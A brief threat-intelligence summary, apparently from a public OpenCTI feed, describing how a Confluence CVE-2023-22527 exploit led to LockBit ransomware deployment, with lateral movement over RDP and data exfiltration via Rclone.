Confluence Exploit Leads to LockBit Ransomware
NetmanageIT OpenCTI - opencti.netmanageit.com
SUMMARY :
An intrusion began with the exploitation of CVE-2023-22527 on an exposed Windows Confluence server, leading to LockBit ransomware deployment across the environment. The threat actor utilized various tools including Mimikatz, Metasploit, and AnyDesk. They leveraged RDP for lateral movement and deployed ransomware through multiple methods, including SMB file copying and automated distribution via PDQ Deploy. Sensitive data was exfiltrated using Rclone to MEGA.io cloud storage. The intrusion had a rapid Time to Ransom of approximately two hours, showcasing the efficiency of the attack.
OPENCTI LABELS :
ransomware,rdp,lateral movement,lockbit,credential theft,confluence,cve-2023-22527,exfiltration
Open in NetmanageIT OpenCTI Public Instance with below link!
Use public read only username and password on login page.
NOTE : Use Public READ only user credentials on login page banner.
Confluence Exploit Leads to LockBit Ransomware